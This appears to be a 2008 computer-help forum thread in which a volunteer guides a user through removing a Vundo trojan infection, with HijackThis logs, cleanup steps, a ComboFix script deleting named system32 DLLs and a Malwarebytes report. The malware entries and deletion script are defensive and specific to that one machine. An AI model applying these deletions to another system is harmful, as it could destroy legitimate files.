O2 - BHO: (no name) - {62F940A5-9D03-4F01-A0D0-FE1308201AE7} - C:\WINDOWS\system32\qoMdabXo.dll (file missing)
O2 - BHO: (no name) - {6C5546A5-BB26-471D-9043-854AFA0AB66D} - C:\WINDOWS\system32\ljJCSkjg.dll (file missing)
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~1\MI1933~1\Office12\GRA8E1~1.DLL
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O4 - HKLM\..\Run: [Broadcom Wireless Manager UI] C:\WINDOWS\system32\WLTRAY.exe
O4 - HKLM\..\Run: [ISUSPM Startup] C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\SPF\smc.exe -startgui
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKLM\..\Run: [GrooveMonitor] "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe"
O4 - HKLM\..\Run: [VMSnap3] C:\WINDOWS\VMSnap3.EXE
O4 - HKLM\..\Run: [Domino] C:\WINDOWS\Domino.EXE
O4 - HKLM\..\Run: [BigDog303] C:\WINDOWS\VM303_STI.EXE VIMICRO USB PC Camera (ZC0301PLH)
O4 - HKLM\..\Run: [cc97e1b9] rundll32.exe "C:\WINDOWS\system32\ccrrhydm.dll",b
O4 - HKLM\..\Run: [BMcfa4d225] Rundll32.exe "C:\WINDOWS\system32\epwhgnjp.dll",s
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Startup: Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Startup: Yahoo! Widget Engine.lnk = C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
O4 - Global Startup: Bluetooth.lnk = ?
O4 - Global Startup: Digital Line Detect.lnk = ?
O8 - Extra context menu item: Download Using &BitSpirit - C:\Program Files\BitSpirit\bsurl.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MI1933~1\Office12\EXCEL.EXE/3000
O8 - Extra context menu item: Send to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MI1933~1\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MI1933~1\Office12\ONBttnIE.dll
O9 - Extra button: PalTalk - {4EAFEF58-EEFA-4116-983D-03B49BCBFFFE} - C:\Program Files\Paltalk Messenger\Paltalk.exe (file missing)
O9 - Extra button: Bonjour - {7F9DB11C-E358-4ca6-A83D-ACC663939424} - C:\Program Files\Bonjour\ExplorerPlugin.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MI1933~1\Office12\REFIEBAR.DLL
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\system32\Shdocvw.dll
O9 - Extra button: Run IMVU - {d9288080-1baa-4bc4-9cf8-a92d743db949} - C:\Documents and Settings\Ahmed Fahmy\Start Menu\Programs\IMVU\Run IMVU.lnk
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
O9 - Extra 'Tools' menuitem: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {20A60F0D-9AFA-4515-A0FD-83BD84642501} (Checkers Class) - http://messenger.zon...kr.cab56986.cab
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (Installation Support) - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} - http://download.mcaf...01/mcinsctl.cab
O16 - DPF: {5D6F45B3-9043-443D-A792-115447494D24} (UnoCtrl Class) - http://messenger.zon...1/GAME_UNO1.cab
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (MSN Games - Installer) - http://messenger.zon...ro.cab56649.cab
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zon...nt.cab56907.cab
O16 - DPF: {DA758BB1-5F89-4465-975F-8D7179A4BCF3} (WheelofFortune Object) - http://messenger.zon...oF.cab57176.cab
O16 - DPF: {F5A7706B-B9C0-4C89-A715-7A0C6B05DD48} (Minesweeper Flags Class) - http://messenger.zon...er.cab56986.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{BF5CCFB5-6096-404D-B329-56E8F3847FA6}: NameServer = 62.117.40.111,62.117.40.112
O17 - HKLM\System\CCS\Services\Tcpip\..\{CA254E2C-5690-497E-9971-569C6268C2DB}: NameServer = 62.117.40.111,80.75.166.250
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\PROGRA~1\MI1933~1\Office12\GR99D3~1.DLL
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL
O20 - Winlogon Notify: iifcARIx - C:\WINDOWS\SYSTEM32\iifcARIx.dll
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: AOL Connectivity Service (AOL ACS) - America Online, Inc. - C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: Autodesk Licensing Service - Autodesk - C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: GoogleDesktopManager - Google - C:\Program Files\Google\Google Desktop Search\GoogleDesktopManager.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Macromedia Licensing Service - Unknown owner - C:\Program Files\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe
O23 - Service: mental ray 3.5 Satellite (32-bit) (mi-raysat_3dsmax9_32) - Unknown owner - C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
O23 - Service: MySQL - Unknown owner - C:\Program.exe (file missing)
O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: Sygate Personal Firewall Pro (SmcService) - Sygate Technologies, Inc. - C:\Program Files\Sygate\SPF\smc.exe
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe
O23 - Service: TuneUp WinStyler Theme Service (TUWinStylerThemeSvc) - TuneUp Software GmbH - C:\Program Files\TuneUp Utilities 2006\WinStylerThemeSvc.exe
O23 - Service: Viewpoint Manager Service - Viewpoint Corporation - C:\Program Files\Viewpoint\Common\ViewpointService.exe
O23 - Service: Dell Wireless WLAN Tray Service (wltrysvc) - Unknown owner - C:\WINDOWS\System32\WLTRYSVC.EXE

--
End of file - 13068 bytes

Edited by a_fahmy7, 16 June 2008 - 03:33 PM.


#5 TheJoker

TheJoker

    Forum Deity

  • Boot Camp Mod
  • PipPipPipPipPip
  • 14,352 posts

Posted 16 June 2008 - 10:27 PM

Should I really delete the saved passwords in firefox private data as well or can I keep those.

You can keep that if you chose to do so. :)
You can either chose to not clear Private Data, or you can click the Settings button to configure what data is cleared.

There are now a few more items that need to be deleted, so please use these instructions.

You are running Paltalk, which is adware and I recommend uninstalling it. If you chose to uninstall it, go to Start > Control Panel > Add or Remove Programs and remove the following program, if found:
PalTalk

Then, using Windows Explorer, delete the program folder at:
C:\Program Files\Paltalk Messenger

IMVU 3D messenger has been known to cause problems and, unless it is something you really want to keep, I recommend optionally removing it using the Control Panel's Add or Remove Programs.

I see you have Viewpoint installed...
Viewpoint Manager is considered to be foistware instead of malware since it is installed without users approval, but doesn't spy or do anything "bad". This will change though, please read this article:
http://www.clickz.co...cle.php/3561546
I suggest you remove the program now. Go to Start > Settings > Control Panel > Add/Remove Programs and remove the following programs if present:
  • Viewpoint
  • Viewpoint Manager
  • Viewpoint Media Player
Reboot afterwards. <-- Important!

If you chose to uninstall Viewpoint, after rebooting, using Windows Explorer delete the following folder if still there:
C:\Program Files\Viewpoint

Clean your Cache and Cookies in IE:
  • Close all instances of Outlook Express and Internet Explorer
  • Go to Control Panel > Internet Options > General tab
  • Click the "Delete Cookies" button
  • Next to it, Click the "Delete Files" button
  • When prompted, place a check in: "Delete all offline content", click OK
Clean your Cache and Cookies in Firefox (In case you also have Firefox installed):
  • Go to Tools > Options.
  • Click Privacy in the menu on the left side of the Options window.
  • Click the Clear button located to the right of each option (History, Cookies, Private Data).
    You can either chose not to clear Private Data, or you can click the Settings button to configure what data is cleared.
  • Click OK to close the Options window
    Alternatively, you can clear all information stored while browsing by clicking Clear All.
    A confirmation dialog box will be shown before clearing the information.
Clean other Temporary files + Recycle bin
  • Go to start > run and type: cleanmgr and click ok.
  • Let it scan your system for files to remove.
  • Make sure Temporary Files, Temporary Internet Files, and Recycle Bin are the only things checked.
  • Press OK to remove them.
Please download Malwarebytes' Anti-Malware from Here or Here

Double Click mbam-setup.exe to install the application.
  • Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.
  • If an update is found, it will download and install the latest version.
  • Once the program has loaded, select "Perform Quick Scan", then click Scan.
  • The scan may take some time to finish,so please be patient.
  • When the scan is complete, click OK, then Show Results to view the results.
  • Make sure that everything is checked, and click Remove Selected.
  • When disinfection is completed, a log will open in Notepad and you may be prompted to Restart. (See Note)
  • The log is automatically saved by MBAM and can be viewed by clicking the Logs tab in MBAM.
  • Copy & Paste the entire report in your next reply along with a fresh HijackThis log.
Note:
If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts.
Click OK to either and let MBAM proceed with the disinfection process.
If asked to restart the computer, please do so immediately.


Now you need to run HijackThis and click "Do a system scan only." Place a check next to the following entries (if they are still there):

O2 - BHO: (no name) - {129FA2A1-408C-4824-83A4-5001581FD01E} - C:\WINDOWS\system32\iifcARIx.dll
O2 - BHO: (no name) - {62F940A5-9D03-4F01-A0D0-FE1308201AE7} - C:\WINDOWS\system32\qoMdabXo.dll (file missing)
O2 - BHO: (no name) - {6C5546A5-BB26-471D-9043-854AFA0AB66D} - C:\WINDOWS\system32\ljJCSkjg.dll (file missing)
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O4 - HKLM\..\Run: [cc97e1b9] rundll32.exe "C:\WINDOWS\system32\ccrrhydm.dll",b
O4 - HKLM\..\Run: [BMcfa4d225] Rundll32.exe "C:\WINDOWS\system32\epwhgnjp.dll",s
O20 - Winlogon Notify: iifcARIx - C:\WINDOWS\SYSTEM32\iifcARIx.dll


If you uninstalled PalTalk as recommended, also check (if still there):
O9 - Extra button: PalTalk - {4EAFEF58-EEFA-4116-983D-03B49BCBFFFE} - C:\Program Files\Paltalk Messenger\Paltalk.exe (file missing)

If you uninstalled IMVU 3D as recommended, also check (if still there):
O9 - Extra button: Run IMVU - {d9288080-1baa-4bc4-9cf8-a92d743db949} - C:\Documents and Settings\Ahmed Fahmy\Start Menu\Programs\IMVU\Run IMVU.lnk

Now close all browser and other windows except for HijackThis, and click "Fix Checked" to have HijackThis fix the entries you checked.

Download ComboFix© by sUBs from one of these links:
http://download.blee...Bs/ComboFix.exe
http://www.forospywa...Bs/ComboFix.exe
http://subs.geekstogo.com/ComboFix.exe

Save the file to your Desktop.

Familiarize yourself with ComboFix before running it:
http://www.bleepingc...to-use-combofix
This includes installing the Windows XP Recovery Console in case you have not installed it yet.

Disconnect from the Internet (pull the connection cable) <-- Important
Close your ESET NOD32 antivirus and any anti-spyware applications you may be running.

For this next step, please ensure that ComboFix.exe is on your desktop:

Please open Notepad *Do Not Use Wordpad!* (Start -> Run -> type notepad in the Open field -> OK) and copy and paste the text present inside the quote box below:
Save this as "CFScript.txt" and change the "Save as type" to "All Files" and place it on your desktop.

File::
C:\WINDOWS\system32\iifcARIx.dll
C:\WINDOWS\system32\qoMdabXo.dll
C:\WINDOWS\system32\ljJCSkjg.dll
C:\WINDOWS\system32\gfvwynfe.dll
C:\WINDOWS\system32\ccrrhydm.dll
C:\WINDOWS\system32\epwhgnjp.dll

Posted Image

Referring to the screenshot above, drag CFScript.txt into ComboFix.exe.
ComboFix will now run a scan on your system. It may reboot your system when it finishes. This is normal.
When finished, it shall produce a log for you, C:\ComboFix.txt. Post that log in your next reply.
CAUTION: Do not mouse-click ComboFix's window while it is running. That may cause it to stall.

After the system restarts, your ESET NOD32 AntiVirus should be running again.
If it isn't, restart it manually.
Reconnect to the Internet.

Please post a new HijackThis log, the log from MBAM, and in a second reply (due to length) the log from ComboFix (combofix.txt), and note any errors encountered.

Free Tools for Fighting Malware
Anti-Virus: avast! Free Antivirus / Avira Free AntiVirus
OnLine Anti-Virus: ESET / BitDefender / F-Secure
Anti-Malware: Malwarebytes' Anti-Malware / Dr.Web CureIt
Spyware/Adware Tools: MVPS HOSTS File / SpywareBlaster
Firewall: Comodo Firewall Free / Privatefirewall
Tutorials: How did I get Infected? / Internet Explorer Privacy & Security Settings
If we have helped, please help us continue the fight by using the Donate button, or see this topic for other ways to donate.

MS MVP 2009-20010 and ASAP Member since 2005


#6 a_fahmy7

a_fahmy7

    Advanced Member

  • Full Member
  • PipPipPip
  • 109 posts

Posted 17 June 2008 - 10:02 AM

No errors encountered :)

Malwarebytes' Anti-Malware Report

Malwarebytes' Anti-Malware 1.17
Database version: 863

4:43:37 PM 6/17/2008
mbam-log-6-17-2008 (16-43-37).txt

Scan type: Quick Scan
Objects scanned: 43656
Time elapsed: 6 minute(s), 1 second(s)

Memory Processes Infected: 0
Memory Modules Infected: 1
Registry Keys Infected: 7
Registry Values Infected: 3
Registry Data Items Infected: 0
Folders Infected: 0
Files Infected: 12

Memory Processes Infected:
(No malicious items detected)

Memory Modules Infected:
C:\WINDOWS\system32\iifcARIx.dll (Trojan.Vundo) -> Unloaded module successfully.

Registry Keys Infected:
HKEY_CLASSES_ROOT\CLSID\{129fa2a1-408c-4824-83a4-5001581fd01e} (Trojan.Vundo) -> Delete on reboot.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{129fa2a1-408c-4824-83a4-5001581fd01e} (Trojan.Vundo) -> Delete on reboot.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\iifcarix (Trojan.Vundo) -> Delete on reboot.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\aoprndtws (Malware.Trace) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\Software\Microsoft\rdfa (Trojan.Vundo) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\FCOVM (Trojan.Vundo) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RemoveRP (Trojan.Vundo) -> Quarantined and deleted successfully.

Registry Values Infected:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{129fa2a1-408c-4824-83a4-5001581fd01e} (Trojan.Vundo) -> Delete on reboot.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cc97e1b9 (Trojan.Vundo) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BMcfa4d225 (Trojan.Agent) -> Quarantined and deleted successfully.

Registry Data Items Infected:
(No malicious items detected)

Folders Infected:
(No malicious items detected)

Files Infected:
C:\WINDOWS\system32\pcmmdprx.dll (Trojan.Vundo) -> Quarantined and deleted successfully.
C:\WINDOWS\system32\xrpdmmcp.ini (Trojan.Vundo) -> Quarantined and deleted successfully.
C:\WINDOWS\system32\iifcARIx.dll (Trojan.Vundo) -> Delete on reboot.
C:\WINDOWS\system32\byXqnKcb.dll (Trojan.Vundo) -> Quarantined and deleted successfully.
C:\WINDOWS\system32\cbXQkjhe.dll (Trojan.Vundo) -> Quarantined and deleted successfully.
C:\WINDOWS\system32\ddcYsRLE.dll (Trojan.Vundo) -> Quarantined and deleted successfully.
C:\WINDOWS\system32\opnKDtrs.dll (Trojan.Vundo) -> Quarantined and deleted successfully.
C:\WINDOWS\system32\tuvWmmKd.dll (Trojan.Vundo) -> Quarantined and deleted successfully.
C:\WINDOWS\system32\wvUOGVPj.dll (Trojan.Vundo) -> Quarantined and deleted successfully.
C:\WINDOWS\system32\mlJCUNeC.dll (Trojan.Vundo) -> Delete on reboot.
C:\WINDOWS\system32\clkcnt.txt (Trojan.Vundo) -> Quarantined and deleted successfully.
C:\WINDOWS\system32\khfFYRkJ.dll (Trojan.Vundo) -> Delete on reboot.

#7 a_fahmy7

a_fahmy7

    Advanced Member

  • Full Member
  • PipPipPip
  • 109 posts

Posted 17 June 2008 - 10:03 AM

HijackThis log file:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 6:03:14 PM, on 6/17/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16674)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Sygate\SPF\smc.exe
C:\WINDOWS\System32\WLTRYSVC.EXE
C:\WINDOWS\System32\bcmwltry.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
C:\WINDOWS\eHome\ehRecvr.exe
C:\WINDOWS\eHome\ehSched.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Autodesk\3ds Max 9\mentalray\satellite\raysat_3dsmax9_32server.exe
C:\Program Files\Eset\nod32krn.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\dllhost.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\WLTRAY.exe
C:\Program Files\Eset\nod32kui.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
C:\WINDOWS\VMSnap3.EXE
C:\WINDOWS\Domino.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
C:\Program Files\Digital Line Detect\DLG.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
C:\WINDOWS\explorer.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Documents and Settings\Ahmed Fahmy\My Documents\My Downloads\HiJackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://jobreeze.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft....k/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft....k/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.c...rch/search.html
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft....k/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Page_URL = www.google.com/ig/dell?hl=en&client=dell-usuk-rel&channel=us&ibd=6061214
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://us.rd.yahoo.c...//www.yahoo.com
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll
O2 - BHO: DriveLetterAccess - {5CA3D70E-1895-11CF-8E15-001234567890} - C:\WINDOWS\system32\dla\tfswshx.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~1\MI1933~1\Office12\GRA8E1~1.DLL
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: (no name) - {AA58ED58-01DD-4d91-8333-CF10577473F7} - (no file)
O3 - Toolbar: (no name) - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - (no file)
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O4 - HKLM\..\Run: [Broadcom Wireless Manager UI] C:\WINDOWS\system32\WLTRAY.exe
O4 - HKLM\..\Run: [ISUSPM Startup] C:\PROGRA~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe -startup
O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\SPF\smc.exe -startgui
O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE
O4 - HKLM\..\Run: [GrooveMonitor] "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe"
O4 - HKLM\..\Run: [VMSnap3] C:\WINDOWS\VMSnap3.EXE
O4 - HKLM\..\Run: [Domino] C:\WINDOWS\Domino.EXE
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Startup: Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Startup: Yahoo! Widget Engine.lnk = C:\Program Files\Yahoo!\Widgets\YahooWidgetEngine.exe
O4 - Global Startup: Bluetooth.lnk = ?
O4 - Global Startup: Digital Line Detect.lnk = ?
O8 - Extra context menu item: Download Using &BitSpirit - C:\Program Files\BitSpirit\bsurl.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MI1933~1\Office12\EXCEL.EXE/3000
O8 - Extra context menu item: Send to &Bluetooth Device... - C:\Program Files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MI1933~1\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MI1933~1\Office12\ONBttnIE.dll
O9 - Extra button: Bonjour - {7F9DB11C-E358-4ca6-A83D-ACC663939424} - C:\Program Files\Bonjour\ExplorerPlugin.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MI1933~1\Office12\REFIEBAR.DLL
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\system32\Shdocvw.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {20A60F0D-9AFA-4515-A0FD-83BD84642501} (Checkers Class) - http://messenger.zon...kr.cab56986.cab
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (Installation Support) - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} - http://download.mcaf...01/mcinsctl.cab
O16 - DPF: {5D6F45B3-9043-443D-A792-115447494D24} (UnoCtrl Class) - http://messenger.zon...1/GAME_UNO1.cab
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (MSN Games - Installer) - http://messenger.zon...ro.cab56649.cab
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zon...nt.cab56907.cab
O16 - DPF: {DA758BB1-5F89-4465-975F-8D7179A4BCF3} (WheelofFortune Object) - http://messenger.zon...oF.cab57176.cab
O16 - DPF: {F5A7706B-B9C0-4C89-A715-7A0C6B05DD48} (Minesweeper Flags Class) - http://messenger.zon...er.cab56986.cab
